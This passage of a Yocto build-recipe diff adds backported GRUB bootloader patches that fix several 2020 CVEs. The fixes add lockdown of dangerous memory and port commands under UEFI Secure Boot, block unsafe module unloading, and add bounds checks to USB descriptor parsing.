++++ b/grub-core/Makefile.core.def
+@@ -204,6 +204,7 @@ kernel = {
+ efi = term/efi/console.c;
+ efi = kern/acpi.c;
+ efi = kern/efi/acpi.c;
++ efi = kern/lockdown.c;
+ i386_coreboot = kern/i386/pc/acpi.c;
+ i386_multiboot = kern/i386/pc/acpi.c;
+ i386_coreboot = kern/acpi.c;
+diff --git a/grub-core/commands/extcmd.c b/grub-core/commands/extcmd.c
+index 69574e2..90a5ca2 100644
+--- a/grub-core/commands/extcmd.c
++++ b/grub-core/commands/extcmd.c
+@@ -19,6 +19,7 @@
+
+ #include <grub/mm.h>
+ #include <grub/list.h>
++#include <grub/lockdown.h>
+ #include <grub/misc.h>
+ #include <grub/extcmd.h>
+ #include <grub/script_sh.h>
+@@ -110,6 +111,28 @@ grub_register_extcmd (const char *name, grub_extcmd_func_t func,
+ summary, description, parser, 1);
+ }
+
++static grub_err_t
++grub_extcmd_lockdown (grub_extcmd_context_t ctxt __attribute__ ((unused)),
++ int argc __attribute__ ((unused)),
++ char **argv __attribute__ ((unused)))
++{
++ return grub_error (GRUB_ERR_ACCESS_DENIED,
++ N_("%s: the command is not allowed when lockdown is enforced"),
++ ctxt->extcmd->cmd->name);
++}
++
++grub_extcmd_t
++grub_register_extcmd_lockdown (const char *name, grub_extcmd_func_t func,
++ grub_command_flags_t flags, const char *summary,
++ const char *description,
++ const struct grub_arg_option *parser)
++{
++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
++ func = grub_extcmd_lockdown;
++
++ return grub_register_extcmd (name, func, flags, summary, description, parser);
++}
++
+ void
+ grub_unregister_extcmd (grub_extcmd_t ext)
+ {
+diff --git a/grub-core/kern/command.c b/grub-core/kern/command.c
+index acd7218..4aabcd4 100644
+--- a/grub-core/kern/command.c
++++ b/grub-core/kern/command.c
+@@ -17,6 +17,7 @@
+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
+ */
+
++#include <grub/lockdown.h>
+ #include <grub/mm.h>
+ #include <grub/command.h>
+
+@@ -77,6 +78,29 @@ grub_register_command_prio (const char *name,
+ return cmd;
+ }
+
++static grub_err_t
++grub_cmd_lockdown (grub_command_t cmd __attribute__ ((unused)),
++ int argc __attribute__ ((unused)),
++ char **argv __attribute__ ((unused)))
++
++{
++ return grub_error (GRUB_ERR_ACCESS_DENIED,
++ N_("%s: the command is not allowed when lockdown is enforced"),
++ cmd->name);
++}
++
++grub_command_t
++grub_register_command_lockdown (const char *name,
++ grub_command_func_t func,
++ const char *summary,
++ const char *description)
++{
++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
++ func = grub_cmd_lockdown;
++
++ return grub_register_command_prio (name, func, summary, description, 0);
++}
++
+ void
+ grub_unregister_command (grub_command_t cmd)
+ {
+diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
+new file mode 100644
+index 0000000..1e56c0b
+--- /dev/null
++++ b/grub-core/kern/lockdown.c
+@@ -0,0 +1,80 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2020 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ *
++ */
++
++#include <grub/dl.h>
++#include <grub/file.h>
++#include <grub/lockdown.h>
++#include <grub/verify.h>
++
++static int lockdown = GRUB_LOCKDOWN_DISABLED;
++
++static grub_err_t
++lockdown_verifier_init (grub_file_t io __attribute__ ((unused)),
++ enum grub_file_type type,
++ void **context __attribute__ ((unused)),
++ enum grub_verify_flags *flags)
++{
++ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
++
++ switch (type & GRUB_FILE_TYPE_MASK)
++ {
++ case GRUB_FILE_TYPE_GRUB_MODULE:
++ case GRUB_FILE_TYPE_LINUX_KERNEL:
++ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
++ case GRUB_FILE_TYPE_XEN_HYPERVISOR:
++ case GRUB_FILE_TYPE_BSD_KERNEL:
++ case GRUB_FILE_TYPE_XNU_KERNEL:
++ case GRUB_FILE_TYPE_PLAN9_KERNEL:
++ case GRUB_FILE_TYPE_NTLDR:
++ case GRUB_FILE_TYPE_TRUECRYPT:
++ case GRUB_FILE_TYPE_FREEDOS:
++ case GRUB_FILE_TYPE_PXECHAINLOADER:
++ case GRUB_FILE_TYPE_PCCHAINLOADER:
++ case GRUB_FILE_TYPE_COREBOOT_CHAINLOADER:
++ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
++ case GRUB_FILE_TYPE_ACPI_TABLE:
++ case GRUB_FILE_TYPE_DEVICE_TREE_IMAGE:
++ *flags = GRUB_VERIFY_FLAGS_DEFER_AUTH;
++
++ /* Fall through. */
++
++ default:
++ return GRUB_ERR_NONE;
++ }
++}
++
++struct grub_file_verifier lockdown_verifier =
++ {
++ .name = "lockdown_verifier",
++ .init = lockdown_verifier_init,
++ };
++
++void
++grub_lockdown (void)
++{
++ lockdown = GRUB_LOCKDOWN_ENABLED;
++
++ grub_verifier_register (&lockdown_verifier);
++}
++
++int
++grub_is_lockdown (void)
++{
++ return lockdown;
++}
+diff --git a/include/grub/command.h b/include/grub/command.h
+index eee4e84..2a6f7f8 100644
+--- a/include/grub/command.h
++++ b/include/grub/command.h
+@@ -86,6 +86,11 @@ EXPORT_FUNC(grub_register_command_prio) (const char *name,
+ const char *summary,
+ const char *description,
+ int prio);
++grub_command_t
++EXPORT_FUNC(grub_register_command_lockdown) (const char *name,
++ grub_command_func_t func,
++ const char *summary,
++ const char *description);
+ void EXPORT_FUNC(grub_unregister_command) (grub_command_t cmd);
+
+ static inline grub_command_t
+diff --git a/include/grub/extcmd.h b/include/grub/extcmd.h
+index 19fe592..fe9248b 100644
+--- a/include/grub/extcmd.h
++++ b/include/grub/extcmd.h
+@@ -62,6 +62,13 @@ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd) (const char *name,
+ const char *description,
+ const struct grub_arg_option *parser);
+
++grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_lockdown) (const char *name,
++ grub_extcmd_func_t func,
++ grub_command_flags_t flags,
++ const char *summary,
++ const char *description,
++ const struct grub_arg_option *parser);
++
+ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_prio) (const char *name,
+ grub_extcmd_func_t func,
+ grub_command_flags_t flags,
+diff --git a/include/grub/lockdown.h b/include/grub/lockdown.h
+new file mode 100644
+index 0000000..40531fa
+--- /dev/null
++++ b/include/grub/lockdown.h
+@@ -0,0 +1,44 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2020 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#ifndef GRUB_LOCKDOWN_H
++#define GRUB_LOCKDOWN_H 1
++
++#include <grub/symbol.h>
++
++#define GRUB_LOCKDOWN_DISABLED 0
++#define GRUB_LOCKDOWN_ENABLED 1
++
++#ifdef GRUB_MACHINE_EFI
++extern void
++EXPORT_FUNC (grub_lockdown) (void);
++extern int
++EXPORT_FUNC (grub_is_lockdown) (void);
++#else
++static inline void
++grub_lockdown (void)
++{
++}
++
++static inline int
++grub_is_lockdown (void)
++{
++ return GRUB_LOCKDOWN_DISABLED;
++}
++#endif
++#endif /* ! GRUB_LOCKDOWN_H */
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch
new file mode 100644
index 0000000000..93fdd2cb1a
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch
@@ -0,0 +1,57 @@
+From bfb9c44298aa202c176fef8dc5ea48f9b0e76e5e Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Tue, 2 Feb 2021 19:59:48 +0100
+Subject: [PATCH] kern/lockdown: Set a variable if the GRUB is locked down
+
+It may be useful for scripts to determine whether the GRUB is locked
+down or not. Add the lockdown variable which is set to "y" when the GRUB
+is locked down.
+
+Suggested-by: Dimitri John Ledkov <xnox@ubuntu.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d90367471779c240e002e62edfb6b31fc85b4908]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 3 +++
+ grub-core/kern/lockdown.c | 4 ++++
+ 2 files changed, 7 insertions(+)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index d778bfb..5e6cace 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5802,6 +5802,9 @@ The GRUB can be locked down when booted on a secure boot environment, for exampl
+ if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
+ be restricted and some operations/commands cannot be executed.
+
++The @samp{lockdown} variable is set to @samp{y} when the GRUB is locked down.
++Otherwise it does not exit.
++
+ @node Platform limitations
+ @chapter Platform limitations
+
+diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
+index 1e56c0b..0bc70fd 100644
+--- a/grub-core/kern/lockdown.c
++++ b/grub-core/kern/lockdown.c
+@@ -18,6 +18,7 @@
+ */
+
+ #include <grub/dl.h>
++#include <grub/env.h>
+ #include <grub/file.h>
+ #include <grub/lockdown.h>
+ #include <grub/verify.h>
+@@ -71,6 +72,9 @@ grub_lockdown (void)
+ lockdown = GRUB_LOCKDOWN_ENABLED;
+
+ grub_verifier_register (&lockdown_verifier);
++
++ grub_env_set ("lockdown", "y");
++ grub_env_export ("lockdown");
+ }
+
+ int
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
new file mode 100644
index 0000000000..ac509b63c7
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
@@ -0,0 +1,52 @@
+From 0d809c0979ced9db4d0e500b3e812bba95e52972 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:29 +0200
+Subject: [PATCH] efi: Lockdown the GRUB when the UEFI Secure Boot is enabled
+
+If the UEFI Secure Boot is enabled then the GRUB must be locked down
+to prevent executing code that can potentially be used to subvert its
+verification mechanisms.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=98b00a403cbf2ba6833d1ac0499871b27a08eb77]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/init.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/grub-core/kern/efi/init.c b/grub-core/kern/efi/init.c
+index 3dfdf2d..db84d82 100644
+--- a/grub-core/kern/efi/init.c
++++ b/grub-core/kern/efi/init.c
+@@ -20,6 +20,7 @@
+ #include <grub/efi/efi.h>
+ #include <grub/efi/console.h>
+ #include <grub/efi/disk.h>
++#include <grub/lockdown.h>
+ #include <grub/term.h>
+ #include <grub/misc.h>
+ #include <grub/env.h>
+@@ -39,6 +40,20 @@ grub_efi_init (void)
+ /* Initialize the memory management system. */
+ grub_efi_mm_init ();
+
++ /*
++ * Lockdown the GRUB and register the shim_lock verifier
++ * if the UEFI Secure Boot is enabled.
++ */
++ if (grub_efi_secure_boot ())
++ {
++ grub_lockdown ();
++ /* NOTE: Our version does not have the shim_lock_verifier,
++ * need to update below if added */
++#if 0
++ grub_shim_lock_verifier_setup ();
++#endif
++ }
++
+ efi_call_4 (grub_efi_system_table->boot_services->set_watchdog_timer,
+ 0, 0, 0, NULL);
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
new file mode 100644
index 0000000000..12ec4e1c17
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
@@ -0,0 +1,158 @@
+From 1ad728b08ba2a21573e5f81a565114f74ca33988 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:33 +0200
+Subject: [PATCH] efi: Use grub_is_lockdown() instead of hardcoding a disabled
+ modules list
+
+Now the GRUB can check if it has been locked down and this can be used to
+prevent executing commands that can be utilized to circumvent the UEFI
+Secure Boot mechanisms. So, instead of hardcoding a list of modules that
+have to be disabled, prevent the usage of commands that can be dangerous.
+
+This not only allows the commands to be disabled on other platforms, but
+also properly separate the concerns. Since the shim_lock verifier logic
+should be only about preventing to run untrusted binaries and not about
+defining these kind of policies.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8f73052885892bc0dbc01e297f79d7cf4925e491]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 10 ++++++++++
+ grub-core/commands/i386/wrmsr.c | 5 +++--
+ grub-core/commands/iorw.c | 19 ++++++++++---------
+ grub-core/commands/memrw.c | 19 ++++++++++---------
+ 4 files changed, 33 insertions(+), 20 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 5e6cace..0786427 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5256,6 +5256,9 @@ only applies to the particular cpu/core/thread that runs the command.
+ Also, if you specify a reserved or unimplemented MSR address, it will
+ cause a general protection exception (which is not currently being handled)
+ and the system will reboot.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This is done to prevent subverting various security mechanisms.
+ @end deffn
+
+ @node xen_hypervisor
+@@ -5758,6 +5761,13 @@ security reasons. All above mentioned requirements are enforced by the
+ shim_lock module. And itself it is a persistent module which means that
+ it cannot be unloaded if it was loaded into the memory.
+
++All GRUB modules not stored in the @file{core.img}, OS kernels, ACPI tables,
++Device Trees, etc. have to be signed, e.g, using PGP. Additionally, the commands
++that can be used to subvert the UEFI secure boot mechanism, such as @command{iorw}
++and @command{memrw} will not be available when the UEFI secure boot is enabled.
++This is done for security reasons and are enforced by the GRUB Lockdown mechanism
++(@pxref{Lockdown}).
++
+ @node Measured Boot
+ @section Measuring boot components
+
+diff --git a/grub-core/commands/i386/wrmsr.c b/grub-core/commands/i386/wrmsr.c
+index 9c5e510..56a29c2 100644
+--- a/grub-core/commands/i386/wrmsr.c
++++ b/grub-core/commands/i386/wrmsr.c
+@@ -24,6 +24,7 @@
+ #include <grub/env.h>
+ #include <grub/command.h>
+ #include <grub/extcmd.h>
++#include <grub/lockdown.h>
+ #include <grub/i18n.h>
+ #include <grub/i386/cpuid.h>
+ #include <grub/i386/wrmsr.h>
+@@ -83,8 +84,8 @@ grub_cmd_msr_write (grub_command_t cmd __attribute__ ((unused)), int argc, char
+
+ GRUB_MOD_INIT(wrmsr)
+ {
+- cmd_write = grub_register_command ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
+- N_("Write a value to a CPU model specific register."));
++ cmd_write = grub_register_command_lockdown ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
++ N_("Write a value to a CPU model specific register."));
+ }
+
+ GRUB_MOD_FINI(wrmsr)
+diff --git a/grub-core/commands/iorw.c b/grub-core/commands/iorw.c
+index a0c164e..584baec 100644
+--- a/grub-core/commands/iorw.c
++++ b/grub-core/commands/iorw.c
+@@ -23,6 +23,7 @@
+ #include <grub/env.h>
+ #include <grub/cpu/io.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -131,17 +132,17 @@ GRUB_MOD_INIT(memrw)
+ N_("PORT"), N_("Read 32-bit value from PORT."),
+ options);
+ cmd_write_byte =
+- grub_register_command ("outb", grub_cmd_write,
+- N_("PORT VALUE [MASK]"),
+- N_("Write 8-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outb", grub_cmd_write,
++ N_("PORT VALUE [MASK]"),
++ N_("Write 8-bit VALUE to PORT."));
+ cmd_write_word =
+- grub_register_command ("outw", grub_cmd_write,
+- N_("PORT VALUE [MASK]"),
+- N_("Write 16-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outw", grub_cmd_write,
++ N_("PORT VALUE [MASK]"),
++ N_("Write 16-bit VALUE to PORT."));
+ cmd_write_dword =
+- grub_register_command ("outl", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 32-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outl", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 32-bit VALUE to PORT."));
+ }
+
+ GRUB_MOD_FINI(memrw)
+diff --git a/grub-core/commands/memrw.c b/grub-core/commands/memrw.c
+index 98769ea..d401a6d 100644
+--- a/grub-core/commands/memrw.c
++++ b/grub-core/commands/memrw.c
+@@ -22,6 +22,7 @@
+ #include <grub/extcmd.h>
+ #include <grub/env.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -133,17 +134,17 @@ GRUB_MOD_INIT(memrw)
+ N_("ADDR"), N_("Read 32-bit value from ADDR."),
+ options);
+ cmd_write_byte =
+- grub_register_command ("write_byte", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 8-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_byte", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 8-bit VALUE to ADDR."));
+ cmd_write_word =
+- grub_register_command ("write_word", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 16-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_word", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 16-bit VALUE to ADDR."));
+ cmd_write_dword =
+- grub_register_command ("write_dword", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 32-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_dword", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 32-bit VALUE to ADDR."));
+ }
+
+ GRUB_MOD_FINI(memrw)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-25632.patch b/meta/recipes-bsp/grub/files/CVE-2020-25632.patch
new file mode 100644
index 0000000000..0b37c72f0f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25632.patch
@@ -0,0 +1,90 @@
+From 7630ec5397fe418276b360f9011934b8c034936c Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Tue, 29 Sep 2020 14:08:55 +0200
+Subject: [PATCH] dl: Only allow unloading modules that are not dependencies
+
+When a module is attempted to be removed its reference counter is always
+decremented. This means that repeated rmmod invocations will cause the
+module to be unloaded even if another module depends on it.
+
+This may lead to a use-after-free scenario allowing an attacker to execute
+arbitrary code and by-pass the UEFI Secure Boot protection.
+
+While being there, add the extern keyword to some function declarations in
+that header file.
+
+Fixes: CVE-2020-25632
+
+Reported-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7630ec5397fe418276b360f9011934b8c034936c]
+CVE: CVE-2020-25632
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/minicmd.c | 7 +++++--
+ grub-core/kern/dl.c | 9 +++++++++
+ include/grub/dl.h | 8 +++++---
+ 3 files changed, 19 insertions(+), 5 deletions(-)
+
+diff --git a/grub-core/commands/minicmd.c b/grub-core/commands/minicmd.c
+index 6bbce3128..fa498931e 100644
+--- a/grub-core/commands/minicmd.c
++++ b/grub-core/commands/minicmd.c
+@@ -140,8 +140,11 @@ grub_mini_cmd_rmmod (struct grub_command *cmd __attribute__ ((unused)),
+ if (grub_dl_is_persistent (mod))
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload persistent module");
+
+- if (grub_dl_unref (mod) <= 0)
+- grub_dl_unload (mod);
++ if (grub_dl_ref_count (mod) > 1)
++ return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload referenced module");
++
++ grub_dl_unref (mod);
++ grub_dl_unload (mod);
+
+ return 0;
+ }
+diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
+index 48eb5e7b6..48f8a7907 100644
+--- a/grub-core/kern/dl.c
++++ b/grub-core/kern/dl.c
+@@ -549,6 +549,15 @@ grub_dl_unref (grub_dl_t mod)
+ return --mod->ref_count;
+ }
+
++int
++grub_dl_ref_count (grub_dl_t mod)
++{
++ if (mod == NULL)
++ return 0;
++
++ return mod->ref_count;
++}
++
+ static void
+ grub_dl_flush_cache (grub_dl_t mod)
+ {
+diff --git a/include/grub/dl.h b/include/grub/dl.h
+index f03c03561..b3753c9ca 100644
+--- a/include/grub/dl.h
++++ b/include/grub/dl.h
+@@ -203,9 +203,11 @@ grub_dl_t EXPORT_FUNC(grub_dl_load) (const char *name);
+ grub_dl_t grub_dl_load_core (void *addr, grub_size_t size);
+ grub_dl_t EXPORT_FUNC(grub_dl_load_core_noinit) (void *addr, grub_size_t size);
+ int EXPORT_FUNC(grub_dl_unload) (grub_dl_t mod);
+-void grub_dl_unload_unneeded (void);
+-int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
+-int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
++extern void grub_dl_unload_unneeded (void);
++extern int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
++extern int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
++extern int EXPORT_FUNC(grub_dl_ref_count) (grub_dl_t mod);
++
+ extern grub_dl_t EXPORT_VAR(grub_dl_head);
+
+ #ifndef GRUB_UTIL
+--
+2.33.0
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-25647.patch b/meta/recipes-bsp/grub/files/CVE-2020-25647.patch
new file mode 100644
index 0000000000..cb77fd4772
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25647.patch
@@ -0,0 +1,119 @@
+From 128c16a682034263eb519c89bc0934eeb6fa8cfa Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Fri, 11 Dec 2020 19:19:21 +0100
+Subject: [PATCH] usb: Avoid possible out-of-bound accesses caused by malicious
+ devices
+
+The maximum number of configurations and interfaces are fixed but there is
+no out-of-bound checking to prevent a malicious USB device to report large
+values for these and cause accesses outside the arrays' memory.
+
+Fixes: CVE-2020-25647
+
+Reported-by: Joseph Tartaro <joseph.tartaro@ioactive.com>
+Reported-by: Ilja Van Sprundel <ivansprundel@ioactive.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=128c16a682034263eb519c89bc0934eeb6fa8cfa]
+CVE: CVE-2020-25647
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/bus/usb/usb.c | 15 ++++++++++++---
+ include/grub/usb.h | 10 +++++++---
+ 2 files changed, 19 insertions(+), 6 deletions(-)
+
+diff --git a/grub-core/bus/usb/usb.c b/grub-core/bus/usb/usb.c
+index 8da5e4c74..7cb3cc230 100644
+--- a/grub-core/bus/usb/usb.c
++++ b/grub-core/bus/usb/usb.c
+@@ -75,6 +75,9 @@ grub_usb_controller_iterate (grub_usb_controller_iterate_hook_t hook,
+ grub_usb_err_t
+ grub_usb_clear_halt (grub_usb_device_t dev, int endpoint)
+ {
++ if (endpoint >= GRUB_USB_MAX_TOGGLE)
++ return GRUB_USB_ERR_BADDEVICE;
++
+ dev->toggle[endpoint] = 0;
+ return grub_usb_control_msg (dev, (GRUB_USB_REQTYPE_OUT
+ | GRUB_USB_REQTYPE_STANDARD
+@@ -134,10 +137,10 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+ return err;
+ descdev = &dev->descdev;
+
+- for (i = 0; i < 8; i++)
++ for (i = 0; i < GRUB_USB_MAX_CONF; i++)
+ dev->config[i].descconf = NULL;
+
+- if (descdev->configcnt == 0)
++ if (descdev->configcnt == 0 || descdev->configcnt > GRUB_USB_MAX_CONF)
+ {
+ err = GRUB_USB_ERR_BADDEVICE;
+ goto fail;
+@@ -172,6 +175,12 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+ /* Skip the configuration descriptor. */
+ pos = dev->config[i].descconf->length;
+
++ if (dev->config[i].descconf->numif > GRUB_USB_MAX_IF)
++ {
++ err = GRUB_USB_ERR_BADDEVICE;
++ goto fail;
++ }
++
+ /* Read all interfaces. */
+ for (currif = 0; currif < dev->config[i].descconf->numif; currif++)
+ {
+@@ -217,7 +226,7 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+
+ fail:
+
+- for (i = 0; i < 8; i++)
++ for (i = 0; i < GRUB_USB_MAX_CONF; i++)
+ grub_free (dev->config[i].descconf);
+
+ return err;
+diff --git a/include/grub/usb.h b/include/grub/usb.h
+index 512ae1dd0..6475c552f 100644
+--- a/include/grub/usb.h
++++ b/include/grub/usb.h
+@@ -23,6 +23,10 @@
+ #include <grub/usbdesc.h>
+ #include <grub/usbtrans.h>
+
++#define GRUB_USB_MAX_CONF 8
++#define GRUB_USB_MAX_IF 32
++#define GRUB_USB_MAX_TOGGLE 256
++
+ typedef struct grub_usb_device *grub_usb_device_t;
+ typedef struct grub_usb_controller *grub_usb_controller_t;
+ typedef struct grub_usb_controller_dev *grub_usb_controller_dev_t;
+@@ -167,7 +171,7 @@ struct grub_usb_configuration
+ struct grub_usb_desc_config *descconf;
+
+ /* Interfaces associated to this configuration. */
+- struct grub_usb_interface interf[32];
++ struct grub_usb_interface interf[GRUB_USB_MAX_IF];
+ };
+
+ struct grub_usb_hub_port
+@@ -191,7 +195,7 @@ struct grub_usb_device
+ struct grub_usb_controller controller;
+
+ /* Device configurations (after opening the device). */
+- struct grub_usb_configuration config[8];
++ struct grub_usb_configuration config[GRUB_USB_MAX_CONF];
+
+ /* Device address. */
+ int addr;
+@@ -203,7 +207,7 @@ struct grub_usb_device
+ int initialized;
+
+ /* Data toggle values (used for bulk transfers only). */
+- int toggle[256];
++ int toggle[GRUB_USB_MAX_TOGGLE];
+
+ /* Used by libusb wrapper. Schedulded for removal. */
+ void *data;
+--
+2.33.0
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27749.patch b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
new file mode 100644
index 0000000000..a2566b2ded
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
@@ -0,0 +1,609 @@
+From 4ea7bae51f97e49c84dc67ea30b466ca8633b9f6 Mon Sep 17 00:00:00 2001
+From: Chris Coulson <chris.coulson@canonical.com>
+Date: Thu, 7 Jan 2021 19:21:03 +0000
+Subject: kern/parser: Fix a stack buffer overflow
+
+grub_parser_split_cmdline() expands variable names present in the supplied
+command line in to their corresponding variable contents and uses a 1 kiB
+stack buffer for temporary storage without sufficient bounds checking. If
+the function is called with a command line that references a variable with
+a sufficiently large payload, it is possible to overflow the stack
+buffer via tab completion, corrupt the stack frame and potentially
+control execution.
+
+Fixes: CVE-2020-27749
+
+Reported-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=c6c426e5ab6ea715153b72584de6bd8c82f698ec && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=b1c9e9e889e4273fb15712051c887e6078511448 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=3d157bbd06506b170fde5ec23980c4bf9f7660e2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=8bc817014ce3d7a498db44eae33c8b90e2430926 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=030fb6c4fa354cdbd6a8d6903dfed5d36eaf3cb2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=4ea7bae51f97e49c84dc67ea30b466ca8633b9f6]
+CVE: CVE-2020-27749
+
